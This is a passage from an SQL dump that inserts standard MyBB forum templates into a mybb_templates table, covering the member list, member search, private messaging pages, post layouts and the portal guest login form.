{$postoptionschecked[\'signature\']} />&nbsp;<strong>{$lang->signature}</strong></label><br /> <label><input type=\"checkbox\" class=\"checkbox\" name=\"postoptions[disablesmilies]\" value=\"1\" />&nbsp;<strong>{$lang->disable_smilies}</strong></label>{$closeoption}</span> </td> <td class=\"trow1\"> <div style=\"width: 95%\"> <textarea style=\"width: 100%; padding: 4px; margin: 0;\" rows=\"8\" cols=\"80\" name=\"message\" id=\"message\" tabindex=\"1\"></textarea> </div> <div class=\"editor_control_bar\" style=\"width: 95%; padding: 4px; margin-top: 3px; display: none;\" id=\"quickreply_multiquote\"> <span class=\"smalltext\"> {$lang->quickreply_multiquote_selected} <a href=\"./newreply.php?tid={$tid}&amp;load_all_quotes=1\" onclick=\"return Thread.loadMultiQuoted();\">{$lang->quickreply_multiquote_now}</a> {$lang->or} <a href=\"javascript:Thread.clearMultiQuoted();\">{$lang->quickreply_multiquote_deselect}</a>. </span> </div> </td> </tr> {$captcha} <tr> <td colspan=\"2\" align=\"center\" class=\"tfoot\"><input type=\"submit\" class=\"button\" value=\"{$lang->post_reply}\" tabindex=\"2\" accesskey=\"s\" id=\"quick_reply_submit\" /> <input type=\"submit\" class=\"button\" name=\"previewpost\" value=\"{$lang->preview_post}\" tabindex=\"3\" /></td> </tr> </tbody> </table> </form>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('184', 'memberlist', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->member_list}</title> {$headerinclude} </head> <body> {$header} {$multipage} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"float_right\"> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->a}\" style=\"padding: 5px;\">{$lang->a}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->b}\" style=\"padding: 5px;\">{$lang->b}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->c}\" style=\"padding: 5px;\">{$lang->c}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->d}\" style=\"padding: 5px;\">{$lang->d}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->e}\" style=\"padding: 5px;\">{$lang->e}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->f}\" style=\"padding: 5px;\">{$lang->f}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->g}\" style=\"padding: 5px;\">{$lang->g}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->h}\" style=\"padding: 5px;\">{$lang->h}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->i}\" style=\"padding: 5px;\">{$lang->i}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->j}\" style=\"padding: 5px;\">{$lang->j}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->k}\" style=\"padding: 5px;\">{$lang->k}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->l}\" style=\"padding: 5px;\">{$lang->l}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->m}\" style=\"padding: 5px;\">{$lang->m}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->n}\" style=\"padding: 5px;\">{$lang->n}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->o}\" style=\"padding: 5px;\">{$lang->o}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->p}\" style=\"padding: 5px;\">{$lang->p}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->q}\" style=\"padding: 5px;\">{$lang->q}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->r}\" style=\"padding: 5px;\">{$lang->r}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->s}\" style=\"padding: 5px;\">{$lang->s}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->t}\" style=\"padding: 5px;\">{$lang->t}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->u}\" style=\"padding: 5px;\">{$lang->u}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->v}\" style=\"padding: 5px;\">{$lang->v}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->w}\" style=\"padding: 5px;\">{$lang->w}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->x}\" style=\"padding: 5px;\">{$lang->x}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->y}\" style=\"padding: 5px;\">{$lang->y}</a> <a href=\"memberlist.php?username_match=begins&amp;username={$lang->z}\" style=\"padding: 5px;\">{$lang->z}</a> </div> <div><strong>{$lang->member_list}</strong></div></td> </tr> <tr> <td class=\"tcat\" width=\"1%\"><span class=\"smalltext\"><strong>{$lang->avatar}</strong></span></td> <td class=\"tcat\"><span class=\"smalltext\"><strong>{$lang->username}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->joined}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->lastvisit}</strong></span></td> <td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td> {$referral_header} </tr> {$users} </table> <div class=\"float_right\" style=\"padding-top: 4px;\"> <a href=\"showteam.php\"><strong>{$lang->forumteam}</strong></a> </div> {$multipage} <br style=\"clear: both;\" /> <br /> <form method=\"post\" action=\"memberlist.php\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"3\"> <div class=\"float_right\"> <strong><a href=\"memberlist.php?action=search\">{$lang->advanced_search}</a></strong> </div> <div><strong>{$lang->search_members}</strong></div> </td> </tr> <tr> <td class=\"tcat\"><strong><label for=\"username\">{$lang->username}</label></strong></td> <td class=\"tcat\"><strong><label for=\"website\">{$lang->website}</label></strong></td> <td class=\"tcat\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td> </tr> <tr> <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\"> {$lang->contains}<br /> <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 99%; margin-top: 4px;\" value=\"{$search_username}\" /> </td> <td class=\"trow1\" width=\"33%\" style=\"vertical-align: top;\"> {$lang->contains}<br /> <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" style=\"width: 99%; margin-top: 4px;\" value=\"{$search_website}\" /> </td> <td class=\"trow1\" width=\"33%\"> <select name=\"sort\" id=\"sort\" style=\"width: 99%;\"> <option value=\"username\"{$sort_selected[\'username\']}>{$lang->sort_by_username}</option> <option value=\"regdate\"{$sort_selected[\'regdate\']}>{$lang->sort_by_regdate}</option> <option value=\"lastvisit\"{$sort_selected[\'lastvisit\']}>{$lang->sort_by_lastvisit}</option> <option value=\"postnum\"{$sort_selected[\'postnum\']}>{$lang->sort_by_posts}</option> <option value=\"referrals\"{$sort_selected[\'referrals\']}>{$lang->sort_by_referrals}</option> </select><br /> <span class=\"smalltext\"> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"ascending\"{$order_check[\'ascending\']} /> <label for=\"order_asc\">{$lang->order_asc}</label><br /> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"descending\"{$order_check[\'descending\']} /> <label for=\"order_desc\">{$lang->order_desc}</label> </span> </td> </tr> </table> <div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div> </form> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-2', '1602', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('185', 'memberlist_referrals', '<td class=\"tcat\" width=\"10%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->referrals}</strong></span></td>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('186', 'memberlist_referrals_bit', '<td class=\"{$alt_bg}\" align=\"center\">{$user[\'referrals\']}</td>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('187', 'memberlist_search', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->search_member_list}</title> {$headerinclude} </head> <body> {$header} <form method=\"post\" action=\"memberlist.php\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->search_member_list}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_criteria}</strong></td> </tr> <tr> <td class=\"trow1\" style=\"vertical-align: top;\" width=\"20%\"><strong><label for=\"username\">{$lang->username}</label></strong></td> <td class=\"trow1\"> <select name=\"username_match\"> <option value=\"begins\">{$lang->begins_with}</option> <option value=\"contains\">{$lang->username_contains}</option> </select> &nbsp; <input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" /> </td> </tr> <tr> <td class=\"trow2\" width=\"20%\"><strong><label for=\"website\">{$lang->search_website}</label></strong></td> <td class=\"trow2\"> <input type=\"text\" class=\"textbox\" name=\"website\" id=\"website\" /> </td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"aim\">{$lang->search_aim}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" name=\"aim\" id=\"aim\" /> </td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"msn\">{$lang->search_msn}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" name=\"msn\" id=\"msn\" /> </td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"yahoo\">{$lang->search_yahoo}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" name=\"yahoo\" id=\"yahoo\" /> </td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"icq\">{$lang->search_icq}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" name=\"icq\" id=\"icq\" /> </td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_options}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td> <td class=\"trow1\"> <select name=\"sort\" id=\"sort\"> <option value=\"username\">{$lang->sort_by_username}</option> <option value=\"regdate\">{$lang->sort_by_regdate}</option> <option value=\"lastvisit\">{$lang->sort_by_lastvisit}</option> <option value=\"postnum\">{$lang->sort_by_posts}</option> </select><br /> <span class=\"smalltext\"> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"asc\" /> <label for=\"order_asc\">{$lang->order_asc}</label><br /> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" value=\"desc\" /> <label for=\"order_desc\">{$lang->order_desc}</label> </span> </td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"perpage\">{$lang->per_page}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" size=\"4\" name=\"perpage\" id=\"perpage\" value=\"15\" /> </td> </tr> </table> <div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div> </form> {$footer} <script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { new autoComplete(\"username\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"}); } // --> </script> </body> </html>', '-2', '1405', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('188', 'private', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"pmForm\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\"> <table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" width=\"100%\"> <tr> <td class=\"trow1\">{$pmspacebar}<span class=\"smalltext\"><a href=\"private.php\">{$lang->inbox}</a> | <a href=\"private.php?action=send\">{$lang->compose_message2}</a> | <a href=\"private.php?action=folders\">{$lang->manage_folders}</a> | <a href=\"private.php?action=empty\">{$lang->empty_folders2}</a> | <a href=\"private.php?action=export\">{$lang->export_messages2}</a></span></td> </tr> </table> </td> </tr> </table> <br /> {$limitwarning} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\"> <div class=\"float_right\"> <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" /> <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" /> (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div> <strong>{$lang->pms_in_folder}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"center\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"30%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$sender}</strong></span></td> <td class=\"tcat\" align=\"right\" width=\"20%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td> </tr> {$messagelist} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"6\"> <input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or} <input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages} </td> </tr> </table> <br /> <div class=\"float_left\">{$multipage}</div> <div class=\"float_right\"> <span class=\"smalltext\"> <strong>{$lang->jump_folder} {$folderjump} <input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" /> </strong> </span> </div> </td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"do_stuff\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('189', 'private_search_results', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"pmForm\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"7\"> <div class=\"float_right\"> <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" /> <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" /> (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div> <strong>{$lang->pm_search_results}</strong></td> </tr> <tr> <td class=\"tcat\" align=\"left\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->message}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->sender}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->folder}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td> <td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td> </tr> {$messagelist} <tr> <td class=\"tfoot\" align=\"right\" colspan=\"7\"> <input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or} <input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages} </td> </tr> </table> <br /> <div class=\"float_left\">{$multipage}</div> <div class=\"float_right\"> <span class=\"smalltext\"> <strong>{$lang->jump_folder} {$folderjump} <input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" /> </strong> </span> </div> </td> </tr> </table> <input type=\"hidden\" name=\"action\" value=\"do_stuff\" /> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('190', 'private_advanced_search', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->advanced_private_message_search}</title> {$headerinclude} </head> <body> {$header} <form action=\"private.php\" method=\"post\" name=\"pmForm\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_search\" /> <table width=\"100%\" border=\"0\" align=\"center\"> <tr> {$usercpnav} <td valign=\"top\"> <table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->advanced_private_message_search}</strong></td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_criteria}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"keywords\">{$lang->keywords}</label></strong></td> <td class=\"trow1\"> <input type=\"text\" class=\"textbox\" name=\"keywords\" id=\"keywords\" size=\"35\" maxlength=\"250\" /> <br /> <span class=\"smalltext\"> <label><input type=\"checkbox\" name=\"subject\" checked=\"checked\" value=\"1\" /> {$lang->search_in_subject}</label><br /> <label><input type=\"checkbox\" name=\"message\" checked=\"checked\" value=\"1\" /> {$lang->search_in_message}</label> </span> </td> </tr> <tr> <td class=\"trow2\"><strong><label for=\"keywords\">{$lang->sender}</label></strong></td> <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"sender\" id=\"sender\" size=\"35\" maxlength=\"250\" /></td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->message_status}</strong></td> <td class=\"trow1 smalltext\"> <label><input type=\"checkbox\" name=\"status[new]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_new}</label><br /> <label><input type=\"checkbox\" name=\"status[replied]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_replied_to}</label><br /> <label><input type=\"checkbox\" name=\"status[forwarded]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_forwarded}</label><br /> <label><input type=\"checkbox\" name=\"status[read]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_read}</label> </td> </tr> <tr> <td class=\"trow2\"><strong><label for=\"folder\">{$lang->folder}</label></strong> </td> <td class=\"trow2\"> {$foldersearch} </td> </tr> <tr> <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_options}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td> <td class=\"trow1\"> <select name=\"sort\" id=\"sort\"> <option value=\"subject\">{$lang->sort_by_subject}</option> <option value=\"sender\">{$lang->sort_by_sender}</option> <option value=\"dateline\" selected=\"selected\">{$lang->sort_by_date}</option> </select><br /> <span class=\"smalltext\"> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"asc\" /> <label for=\"order_asc\">{$lang->ascending_order}</label><br /> <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" checked=\"checked\" value=\"desc\" /> <label for=\"order_desc\">{$lang->descending_order}</label> </span> </td> </tr> </table> <br /> <div align=\"center\"><input type=\"submit\" value=\"{$lang->search_private_messages}\" /></div> </td> </tr> </table> </form> {$footer} </body> </html>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('191', 'private_pmspace', '<span style=\"float:right\"><table cellspacing=\"0\" cellpadding=\"0\" width=\"230\" style=\"border: solid 1px #000000;\"> <tr> <td width=\"{$spaceused}\" bgcolor=\"red\" align=\"center\"><span class=\"smalltext\"><strong>{$overhalf}</strong></span></td> <td width=\"{$spaceused2}\" bgcolor=\"green\" align=\"center\"><span class=\"smalltext\"><strong>{$belowhalf}</strong></span></td> <td width=\"130\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->pmspaceused}</strong></span></td> </tr> </table></span>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('192', 'forumdisplay_announcements_announcement', '<tr> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"\"/></td> <td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">&nbsp;</td> <td class=\"{$bgcolor}\"> <a href=\"{$announcement[\'announcementlink\']}\"{$new_class}>{$announcement[\'subject\']}</a> <div class=\"author smalltext\">{$announcement[\'profilelink\']}</div> </td> <td align=\"center\" class=\"{$bgcolor}\">-</td> <td align=\"center\" class=\"{$bgcolor}\">-</td> {$rating} <td class=\"{$bgcolor}\" style=\"white-space: nowrap; text-align: right\"><span class=\"smalltext\">{$postdate} {$posttime}</span></td> {$modann} </tr> ', '-2', '1408', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('193', 'forumdisplay_announcements', '<tr> <td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->forum_announcements}</td> </tr> {$announcements}', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('194', 'forumdisplay_sticky_sep', '<tr> <td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->sticky_threads}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('195', 'forumdisplay_threads_sep', '<tr> <td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->normal_threads}</td> </tr>', '-2', '120', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('196', 'postbit', '{$ignore_bit} <a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\"> <tbody> <tr> <td class=\"tcat\"> <div class=\"float_left smalltext\"> {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span> </div> {$post[\'posturl\']} </td> </tr> <tr> <td class=\"trow1 {$unapproved_shade}\"> <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\"> <tr> <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\"> {$post[\'useravatar\']} </td> <td class=\"post_author\"> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} </span> </td> <td class=\"smalltext post_author_info\" width=\"165\"> {$post[\'user_details\']} </td> </tr> </table> </td> </tr> <tr> <td class=\"trow2 post_content {$unapproved_shade}\"> <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\"> {$post[\'message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\"> {$post[\'iplogged\']} </div> </td> </tr> <tr> <td class=\"trow1 post_buttons {$unapproved_shade}\"> <div class=\"author_buttons float_left\"> {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']} </div> <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']} </div> </td> </tr> </tbody> </table>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('197', 'postbit_classic', '{$ignore_bit} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\"> <tr> <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} {$post[\'useravatar\']}<br /> {$post[\'user_details\']} </span> </td> <td class=\"{$altbg}\" valign=\"top\"> <table width=\"100%\"> <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <br /> <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\"> {$post[\'message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\"> <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div> {$post[\'iplogged\']} </div> </td></tr> </table> </td> </tr> <tr> <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td> <td class=\"{$altbg}\" style=\"vertical-align: middle;\"> <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr valign=\"bottom\"> <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td> <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td> </tr> </table> </td> </tr> </table>', '-2', '1600', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('198', 'postbit_gotopost', '<a href=\"{$url}\" class=\"quick_jump\">&nbsp;</a>', '-2', '1400', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('199', 'forumdisplay_threadlist_clearpass', ' | <a href=\"misc.php?action=clearpass&amp;fid={$fid}&amp;my_post_key={$mybb->post_code}\">{$lang->clear_stored_password}</a>', '-2', '1606', '', '1339729416'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('200', 'portal_welcome_guesttext', '<span class=\"smalltext\">{$lang->guest_welcome_registration}</span><br /> <br /> <form method=\"post\" action=\"{$portal_url}\"><input type=\"hidden\" name=\"action\" value=\"do_login\" /> {$username}<br />&nbsp;&nbsp;<input type=\"text\" class=\"textbox\" name=\"username\" value=\"\" /><br /><br /> {$lang->password}<br />&nbsp;&nbsp;<input type=\"password\" class=\"textbox\" name=\"password\" value=\"\" /><br /><br /> <label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" value=\"yes\" /> {$lang->remember_me}</label><br /><br /> <br /><input type=\"submit\" class=\"button\" name=\"loginsubmit\" value=\"{$lang->login}\" /></form>', '-2', '1607', '', '1339729416'); 